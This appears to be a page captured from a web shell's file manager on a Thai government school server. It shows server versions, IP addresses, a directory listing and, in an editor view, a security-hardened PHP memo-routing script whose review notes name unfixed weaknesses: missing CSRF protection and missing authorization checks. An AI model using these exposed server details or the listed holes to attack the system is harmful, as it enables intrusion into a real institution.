Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
Name
Size
Permission
Action
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
tcpdf
[ DIR ]
drwxr-xr-x
upload_files
[ DIR ]
drwxr-xr-x
add.php
16.08
KB
-rw-r--r--
book_pass.php
17.14
KB
-rw-r--r--
book_pass_form_comment1.php
5.19
KB
-rw-r--r--
book_pass_form_comment2.php
6.49
KB
-rw-r--r--
book_pass_form_comment3.php
2.72
KB
-rw-r--r--
css.css
1.06
KB
-rw-r--r--
default.php
216
B
-rw-r--r--
detail.php
8.11
KB
-rw-r--r--
display.php
9.25
KB
-rw-r--r--
docprint.php
7.22
KB
-rw-r--r--
document-detail.php
8.57
KB
-rw-r--r--
edit.php
20
KB
-rw-r--r--
idocument.sql
6.22
KB
-rw-r--r--
index.php
7.5
KB
-rw-r--r--
menu.php
3.13
KB
-rw-r--r--
menu_mobile.php
898
B
-rw-r--r--
save.php
4.91
KB
-rw-r--r--
time_inc.php
6.03
KB
-rw-r--r--
view.php
9.12
KB
-rw-r--r--
viewlist.php
7.88
KB
-rw-r--r--
Code Editor : book_pass.php
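<?php
/**
 * idocument "book_pass" page: lists the memos routed to the logged-in user and,
 * when ?action=... is present, shows one memo with its comments and the
 * comment/order form that matches the user's position.
 *
 * Must be included by a parent file that defines _VALID_, has started the
 * session and has opened the mysqli connection in $connect.
 *
 * Security changes compared with the previous revision:
 *  - The blanket `foreach ($_REQUEST ...) $$key = $value` import is gone. It let
 *    any request parameter overwrite any variable in this scope (for example
 *    $connect or $id). Only the inputs this file uses are read, by name.
 *    NOTE(review): time_inc.php and the book_pass_form_comment*.php includes may
 *    have relied on the blanket import - confirm they read their own inputs.
 *  - `option` is validated before it is used in a require_once path or echoed.
 *  - Every value placed in SQL is escaped and quoted; the document id must be
 *    all digits.
 *  - Every database or request value written into HTML is escaped.
 *
 * NOTE(review): not fixed here, needs a decision by the maintainers:
 *  - The comment handler accepts GET as well as POST and has no CSRF token.
 *  - Nothing checks that document `id` was actually routed to the current user
 *    before a comment is stored or idocument_main.book_status is changed.
 *  - `document_from` is taken from the request rather than from the session.
 */
defined('_VALID_') or die('Direct Access to this location is not allowed.');

// The module name becomes part of include paths: allow only a plain directory name.
$option = (isset($_REQUEST['option']) && is_string($_REQUEST['option'])) ? $_REQUEST['option'] : '';
if (!preg_match('/\A[A-Za-z0-9_-]+\z/', $option)) {
    die('Direct Access to this location is not allowed.');
}
$bp_module_dir = "modules/$option";

require_once "$bp_module_dir/time_inc.php";

// Closures rather than named functions, so including this file twice cannot
// trigger a "cannot redeclare" fatal error.

// Escape a value for use inside a single-quoted SQL string literal.
// Relies on the connection character set being configured on $connect by the parent.
$bp_sql = function ($value) use ($connect) {
    return mysqli_real_escape_string($connect, is_scalar($value) ? (string) $value : '');
};
// Escape a value for HTML text and quoted attribute context.
// NOTE(review): assumes stored text is plain text, not pre-escaped HTML - confirm.
$bp_html = function ($value) {
    return htmlspecialchars(is_scalar($value) ? (string) $value : '', ENT_QUOTES, 'UTF-8');
};
// Read one scalar request parameter; arrays and missing keys become ''.
$bp_in = function ($name) {
    return (isset($_REQUEST[$name]) && is_scalar($_REQUEST[$name])) ? (string) $_REQUEST[$name] : '';
};

// Explicit input allow-list (replaces the blanket request import).
// The previous code interpolated id unquoted into "where id = $id", which only
// works for numeric ids, so anything that is not all digits is rejected.
$id            = ctype_digit($bp_in('id')) ? $bp_in('id') : '';
$commentLevel  = $bp_in('commentLevel');
$bookto_id     = $bp_in('bookto_id');
$document_from = $bp_in('document_from');
$comment1      = (isset($_REQUEST['comment1']) && is_array($_REQUEST['comment1']))
    ? array_filter($_REQUEST['comment1'], 'is_scalar')
    : array();

$bp_uid     = isset($_SESSION['login_user_id']) ? $_SESSION['login_user_id'] : '';
$bp_uid_sql = $bp_sql($bp_uid);

// Re-evaluate on every request whether the user holds an active delegation today.
$delegate = "SELECT * FROM delegate_main WHERE person_id = '$bp_uid_sql' AND (CURDATE() >=start AND CURDATE() <=finish)";
$query_delegate = mysqli_query($connect, $delegate);
$_SESSION['delegate'] = ($query_delegate && $query_delegate->num_rows > 0) ? 'TRUE' : '';

// Refresh the position code; it selects which comment form is shown further down.
$sql = "Select * From person_main Where person_id = '$bp_uid_sql' ";
$dbquery_permission = mysqli_query($connect, $sql);
$result_permission = $dbquery_permission ? mysqli_fetch_array($dbquery_permission) : null;
$_SESSION['position_code'] = $result_permission ? $result_permission['position_code'] : null;

// Lookup table: bookstatusid => bookstatusname, used to render stored comment choices.
$sql_idocument_status = "SELECT * FROM `idocument_status`";
$query_idocument_status = mysqli_query($connect, $sql_idocument_status);
$arrComment = array();
if ($query_idocument_status) {
    while ($data_idocument_status = mysqli_fetch_assoc($query_idocument_status)) {
        $arrComment[$data_idocument_status['bookstatusid']] = $data_idocument_status['bookstatusname'];
    }
}

// Kept from the previous revision; the list view below recomputes $page and $start.
$perpage = 10;
$page = isset($_GET['page']) ? max(1, (int) $_GET['page']) : 1;
$start = ($page - 1) * $perpage;

// ---------------------------------------------------------------------------
// Comment / order submission
// ---------------------------------------------------------------------------
if (isset($_REQUEST['commentLevel'])) {
    $bp_position = isset($_SESSION['login_userposition']) ? $_SESSION['login_userposition'] : '';
    $bp_office   = isset($_SESSION['office_name']) ? $_SESSION['office_name'] : '';
    $comment_position = isset($_REQUEST['typecmd'])
        ? $bp_position . " " . $bp_in('typecmd') . "\n" . $bp_office
        : $bp_position;

    // SQL-safe copies; the raw values are stored and escaped again on output.
    $bp_level_sql    = $bp_sql($commentLevel);
    $bp_position_sql = $bp_sql($comment_position);
    $bp_bookto_sql   = $bp_sql($bookto_id);
    $bp_from_sql     = $bp_sql($document_from);
    $bp_choices_sql  = $bp_sql(implode(', ', $comment1));

    if ($commentLevel != "") {
        // Marks this user's routing row as handled; used by both branches below.
        $sqlUpdateStatus = "Update idocument_sendto SET status = '1' WHERE document_id ='$id' AND person_id ='$bp_uid_sql'";

        $sqlCHK = "Select * From idocument_comment where document_id= '$id' and person_comments_id ='$bp_uid_sql'";
        $bp_existing = mysqli_query($connect, $sqlCHK);

        if ($bp_existing && mysqli_num_rows($bp_existing) == 0) {
            // First comment by this user on this document.
            $fullname_comment = (isset($_SESSION['login_prename']) ? $_SESSION['login_prename'] : '')
                . (isset($_SESSION['login_name']) ? $_SESSION['login_name'] : '')
                . " "
                . (isset($_SESSION['login_surname']) ? $_SESSION['login_surname'] : '');
            $bp_fullname_sql = $bp_sql($fullname_comment);

            $sqlComment = "Insert INTO idocument_comment(document_id, rec_id, person_comments_id,person_comments_name, person_comments_position, comments_select, comments_etctxt, comments_status) Values('$id', md5('$id'), '$bp_uid_sql', '$bp_fullname_sql','$bp_position_sql', '$bp_choices_sql' , '' , '$bp_level_sql');";

            mysqli_query($connect, $sqlUpdateStatus);
            mysqli_query($connect, $sqlComment);

            // NOTE(review): the single quotes make PHP hash the literal text "$id",
            // so this prefix is identical for every document. Left unchanged because
            // existing rows and other pages may depend on the stored value.
            $rec_id = md5('$id') . $bp_uid;
            $bp_rec_sql = $bp_sql($rec_id);
            $sqlSento = "Insert INTO idocument_sendto(document_id, rec_id, person_id,document_from) Values('$id', '$bp_rec_sql', '$bp_bookto_sql', '$bp_from_sql');";
            mysqli_query($connect, $sqlSento);
        } elseif ($bp_existing) {
            // The user already commented: overwrite the comment and re-route the document.
            $sqlUpdateComment = "UPDATE idocument_comment SET comments_select='$bp_choices_sql', comments_etctxt='', person_comments_position='$bp_position_sql' WHERE document_id ='$id' AND person_comments_id ='$bp_uid_sql'";
            mysqli_query($connect, $sqlUpdateComment);

            $sqlSento = "Update idocument_sendto SET person_id = '$bp_bookto_sql' where document_id ='$id' and document_from = '$bp_uid_sql'";
            mysqli_query($connect, $sqlSento);

            mysqli_query($connect, $sqlUpdateStatus);
        }
    }

    // As before, the document status follows the submitted level even when it is empty.
    $updateStatus = "UPDATE idocument_main SET book_status = '$bp_level_sql' WHERE id ='$id'";
    mysqli_query($connect, $updateStatus);
}
?>
<style type="text/css">
#content td{ font-family: "Sarabun"; font-size: 16pt; }
</style>
<br>
<?php
// ---------------------------------------------------------------------------
// List view: memos routed to the current user
// ---------------------------------------------------------------------------
if (!isset($_GET['action'])) {
?>
<center>
<font color='#006666' size='3'><strong>รายการบันทึกเสนอ</strong></font>
<?php
    // Pagination
    $sql = "select * from `idocument_sendto` where person_id ='$bp_uid_sql' ORDER BY document_id";
    $dbquery = mysqli_query($connect, $sql);
    $num_rows = $dbquery ? mysqli_num_rows($dbquery) : 0;

    $pagelen = 15;                                   // rows per page
    $url_link = "option=idocument&task=book_pass";   // query string used by the pager links
    $totalpages = (int) ceil($num_rows / $pagelen);

    if (!(isset($_REQUEST['page']))) {
        $_REQUEST['page'] = "";
    }
    $bp_last_page = max(1, $totalpages);
    if ($bp_in('page') === '') {
        // No page requested: open on the last page.
        $page = $bp_last_page;
    } else {
        // Clamp to 1..last page so the LIMIT offset is never negative or non-numeric.
        $page = max(1, min((int) $bp_in('page'), $bp_last_page));
    }
    $start = ($page - 1) * $pagelen;

    // $PHP_SELF is only set if the parent defines it; request input can no longer set it.
    $bp_self = isset($PHP_SELF) ? $bp_html($PHP_SELF) : '';

    if (($totalpages > 1) and ($totalpages < 10)) {
        // Short pager: one link per page.
        echo "<div align=center><nav aria-label=\"page navigation\">";
        echo "<ul class=\"pagination pagination-sm justify-content-center\">";
        for ($i = 1; $i <= $totalpages; $i++) {
            if ($i == $page) {
                echo "<li class=\"page-item active\"><a href='#'>$i</a></li>";
            } else {
                echo "<li class=\"page-item\"><a href=\"$bp_self?$url_link&page=$i\">$i</a></li>";
            }
        }
        echo "</ul></nav></div>";
    }

    if ($totalpages >= 10) {
        // Long pager: a window of ten page links plus First/Previous/Next/Last.
        if ($page <= 5) {
            $e_page = 10;
            $s_page = 1;
        } elseif ($totalpages - $page >= 6) {
            $e_page = $page + 4;
            $s_page = $page - 4;
        } else {
            $e_page = $totalpages;
            $s_page = $totalpages - 9;
        }

        echo "<div align=center><nav aria-label=\"page navigation\">";
        echo "<ul class=\"pagination pagination-sm justify-content-center\">";
        if ($page != 1) {
            $f_page1 = $page - 1;
            echo "<li class=\"page-item\"><a href=\"$bp_self?$url_link&page=1\">First</a></li>";
            echo "<li class=\"page-item\"><a href=\"$bp_self?$url_link&page=$f_page1\">Previous</a></li>";
        } else {
            echo "<li class=\"page-item disabled\"><a class = 'disabled'>First</a></li>";
            echo "<li class=\"page-item disabled\"><a class = 'disabled'>Previous</a></li>";
        }
        for ($i = $s_page; $i <= $e_page; $i++) {
            if ($i == $page) {
                echo "<li class=\"page-item active\"><a >$i</a></li>";
            } else {
                echo "<li class=\"page-item\"><a href=\"$bp_self?$url_link&page=$i\">$i</a></li>";
            }
        }
        if ($page < $totalpages) {
            $f_page2 = $page + 1;
            echo "<li class=\"page-item\"><a href=\"$bp_self?$url_link&page=$f_page2\">Next</a></li>";
            echo "<li class=\"page-item\"><a href=\"$bp_self?$url_link&page=$totalpages\">Last</a></li>";
        } else {
            echo "<li class=\"page-item disabled\"><a class = 'disabled'>Next</a></li>";
            echo "<li class=\"page-item disabled\"><a class = 'disabled'>Last</a></li>";
        }
        echo "</ul></nav></div>";
    }
    // End of pagination
?>
</center>
<table border="1" width="98%" align="center">
<thead>
<tr bgcolor=#99ccff>
<td align="center" style ="font-weight: bold">ที่</td>
<td align="center" style ="font-weight: bold">เลขที่</td>
<td align="center" style ="font-weight: bold">เรื่อง</td>
<td align="center" style ="font-weight: bold">ลงวันที่</td>
<td align="center" style ="font-weight: bold">เรียน</td>
<td align="center" style ="font-weight: bold">ผู้บันทึก</td>
<td align="center" style ="font-weight: bold">ลงความเห็น/<br />สั่งการ</td>
<!--th>สถานะ</th-->
</tr>
</thead>
<tbody>
<?php
    $sql = "SELECT * FROM `idocument_sendto` WHERE person_id = '$bp_uid_sql' ORDER BY status DESC, document_id ASC limit $start,$pagelen ";
    $dbquery = mysqli_query($connect, $sql);
    $N   = (($page - 1) * $pagelen) + 0;   // running row number, continues across pages
    $row = (($page - 1) * $pagelen) + 0;   // stays 0 only when page 1 has no rows
    if ($dbquery) {
        $i = 0;
        while ($datarow = mysqli_fetch_assoc($dbquery)) {
            $row++;
            $N++;

            // Values read back from the database are escaped again before reuse in SQL.
            $bp_doc_sql = $bp_sql($datarow['document_id']);

            $sqlID = "SELECT * FROM `idocument_main` where id = '$bp_doc_sql'";
            $dbqueryID = mysqli_query($connect, $sqlID);
            $dataRowDetail = $dbqueryID ? mysqli_fetch_assoc($dbqueryID) : null;

            $bgcolor = (($i % 2) == 1) ? " class='even'" : " class='odd'";
            $i++;

            // Has the current user already commented on this document?
            $sql_chk_comment = "SELECT * FROM `idocument_comment` Where document_id = '$bp_doc_sql' AND person_comments_id = '$bp_uid_sql' ";
            $dbquery_chk_comment = mysqli_query($connect, $sql_chk_comment);
            $bp_subject = $bp_html($dataRowDetail['subject']);
            if (!$dbquery_chk_comment || mysqli_num_rows($dbquery_chk_comment) <= 0) {
                $comment_chk = ' data-toggle="tooltip" data-placement="top" title="บันทึกข้อความรอลงความเห็น/สั่งการ"';
                $img_chk = '<b>' . $bp_subject . '</b> <img src="images/icon_new.gif" border = "0" alt="บันทึกข้อความรอลงความเห็น/สั่งการ" title="บันทึกข้อความรอลงความเห็น/สั่งการ" data-toggle="tooltip" data-placement="top" >';
            } else {
                $comment_chk = "";
                $img_chk = $bp_subject . '<img src="images/b_usrcheck.png" border = "0" alt="ลงความเห็น/สั่งการแล้ว" title="ลงความเห็น/สั่งการแล้ว">';
            }
?>
<tr <?=$bgcolor?> >
<td height=25 align=center><?php echo $N;?></td>
<td align=center><?php echo $bp_html($dataRowDetail['book_no']);?></td>
<td><?php echo $img_chk;?></td>
<td align=center><?php echo thai_dateBook($dataRowDetail['book_date']);?></td>
<td><?php echo $bp_html($dataRowDetail['book_to']);?></td>
<td><?php echo $bp_html($dataRowDetail['officer_name']);?></td>
<td align="center"><a href="?option=<?php echo $bp_html($option);?>&task=book_pass&action=comment&id=<?php echo $bp_html($dataRowDetail['id']);?>" ><span class='glyphicon glyphicon-list-alt' aria-hidden='true'></span></a></td>
</tr>
<?php
            $row++;
        }
        echo (($row == 0) ? "<tr><td colspan=7 align=center><font size=3 color=red>-- ไม่มีรายการบันทึกเสนอ --</font></td></tr>" : "");
    }
?>
</tbody>
</table>
<?php
}
?>
<?php
// ---------------------------------------------------------------------------
// Detail view: one memo, its references/attachments, comments and comment form
// ---------------------------------------------------------------------------
if (isset($_GET['action'])) {
?>
<div class="col-sm-8" style="font-family:'Sarabun';font-size: 16pt; " id="content">
<?php
    // $id was validated as digits-only at the top; an empty id simply matches no row.
    $sql = "Select * From idocument_main where id = '$id'";
    $dbquery = mysqli_query($connect, $sql);
    $dataDisplay = $dbquery ? mysqli_fetch_assoc($dbquery) : null;
?>
<table width="100%" border="0" style="font-family:'Sarabun';font-size: 16pt;">
<tr>
<td width="60"> <img src="./modules/<?php echo $bp_html($option); ?>/main/krut.png" border="0" width="60"> </td>
<td align = "center" valign="middle" colspan="3"> <strong>บันทึกข้อความ</strong> </td>
</tr>
<tr>
<td colspan="4"> <p> <strong>ส่วนราชการ </strong> <?php echo $bp_html($dataDisplay['workgroup_txt']);?> </p> </td>
</tr>
<tr>
<td valign="middle" colspan="2"> <p> <strong>ที่ </strong><?php echo $bp_html($dataDisplay['book_no']);?> </p> </td>
<td valign="middle" align="center" colspan="2"> <p> <strong>วันที่ </strong><?php echo thai_dateBook($dataDisplay['book_date']);?> </p> </td>
</tr>
<tr>
<td colspan="4" style="border-bottom: 1px solid"> <p> <strong>เรื่อง</strong> <?php echo $bp_html($dataDisplay['subject']);?> </p> </td>
</tr>
<tr>
<td colspan="4" style=""> <p><br> <strong>เรียน </strong><?php echo $bp_html($dataDisplay['book_to']);?> </p> </td>
</tr>
<?php
    // Referenced documents and attachments share one layout; only the labels differ.
    // docType => array(row heading, link text used when a file has no description)
    $bp_file_sections = array(
        'ref'    => array('อ้างถึง', 'เอกสารหนังสืออ้างถึง'),
        'attach' => array('สิ่งที่ส่งมาด้วย', 'เอกสารสิ่งที่ส่งมาด้วย'),
    );
    foreach ($bp_file_sections as $bp_doc_type => $bp_labels) {
        $sql = "Select * From idocument_files Where document_id = '$id' and docType = '$bp_doc_type'";
        $result = mysqli_query($connect, $sql);
        if ($result && $result->num_rows > 0) {
            $i = 1;
            echo ' <tr> <td valign="top" width ="120"><strong>' . $bp_labels[0] . '</strong> </td> <td colspan="3" style=""> <p>';
            while ($row = $result->fetch_assoc()) {
                if (!empty($row['file_name'])) {
                    // NOTE(review): file_name is used as a link target as stored; escaping
                    // stops attribute break-out but does not restrict the URL scheme.
                    $bp_link_text = empty($row['file_des']) ? $bp_labels[1] : $bp_html($row['file_des']);
                    echo $i . ". <a target='_blank' href='" . $bp_html($row['file_name']) . "'>" . $bp_link_text . "</a><br>";
                } else {
                    echo $i . ". " . $bp_html($row['file_des']) . "<br>";
                }
                $i++;
            }
            echo ' </p> </td> </tr>';
        }
    }
?>
<tr>
<td colspan="4" style=""> <p> <?php echo nl2br($bp_html($dataDisplay['content1']));?> </p> </td>
</tr>
<tr>
<td colspan="4" style=""> <p> <?php echo nl2br($bp_html($dataDisplay['content2']));?> </p> </td>
</tr>
<tr>
<td colspan="4" style=""> <p> <?php echo nl2br($bp_html($dataDisplay['content3']));?> </p> </td>
</tr>
<tr>
<td colspan="3" style="text-align:center;">
<?php
    // Author's signature image; basename() keeps the lookup inside the signature directory.
    $sigFile = "./modules/person/signature/" . basename((string) $dataDisplay['officer']) . ".png";
    if (file_exists($sigFile)) {
        echo "<img src='" . $bp_html($sigFile) . "' border='0' width='150'>";
    }
?>
<br> (<?php echo $bp_html($dataDisplay['officer_name']);?>)
<br> <?php echo $bp_html($dataDisplay['officer_position']);?>
<br> <?php echo thai_dateBook($dataDisplay['book_date']);?>
</td>
<td style=""></td>
</tr>
</table>
<br /><br />
<?php
    // Comments already recorded on this document, oldest first.
    $sqlComment = "Select * From idocument_comment where document_id = '$id' Order by id";
    $dbqueryComment = mysqli_query($connect, $sqlComment);
    if ($dbqueryComment) {
        while ($commentData = mysqli_fetch_array($dbqueryComment)) {
            $fullname = '( ' . $bp_html($commentData['person_comments_name']) . ' )<br> '
                . nl2br($bp_html($commentData['person_comments_position'])) . '<br> '
                . thai_dateBook($commentData['comments_date']);

            echo "<div class='col-sm-4'>";

            // comments_select is a ", "-joined list of status ids; show the status name
            // when the id is known, otherwise show the stored text itself.
            $data_comment = explode(", ", $commentData['comments_select']);
            $comment = "";
            foreach ($data_comment as $value) {
                if ($value == "") {
                    continue;
                }
                $bp_choice = !empty($arrComment[$value]) ? $arrComment[$value] : $value;
                $comment .= "-" . $bp_html($bp_choice) . "<br />";
            }
            echo $comment;

            echo "<p align=center style='font-family:\"Sarabun\";font-size: 14pt;'>";
            // Commenter's signature image, same lookup rule as the author's above.
            $sigFileComment = "./modules/person/signature/" . basename((string) $commentData['person_comments_id']) . ".png";
            if (file_exists($sigFileComment)) {
                echo "<img src='" . $bp_html($sigFileComment) . "' border='0' width='150'>";
            }
            echo "<br>" . $fullname;
            echo "</p>";
            echo "</div>";
        }
    }
?>
</div>
<div class="col-sm-4" style = "position:fixed; bottom: 0; right:0;" >
<div class="row">
<?php
    // The form shown depends on the position code; an active delegation gets form 2.
    if ($_SESSION['position_code'] == 1) {
        require_once "$bp_module_dir/book_pass_form_comment3.php";
    } elseif ($_SESSION['position_code'] == 2 OR $_SESSION['delegate'] == 'TRUE') {
        require_once "$bp_module_dir/book_pass_form_comment2.php";
    } else {
        require_once "$bp_module_dir/book_pass_form_comment1.php";
    }
?>
</div>
</div>
<?php
}
?>
<script>
$(function () {
  $('[data-toggle="tooltip"]').tooltip()
})
</script>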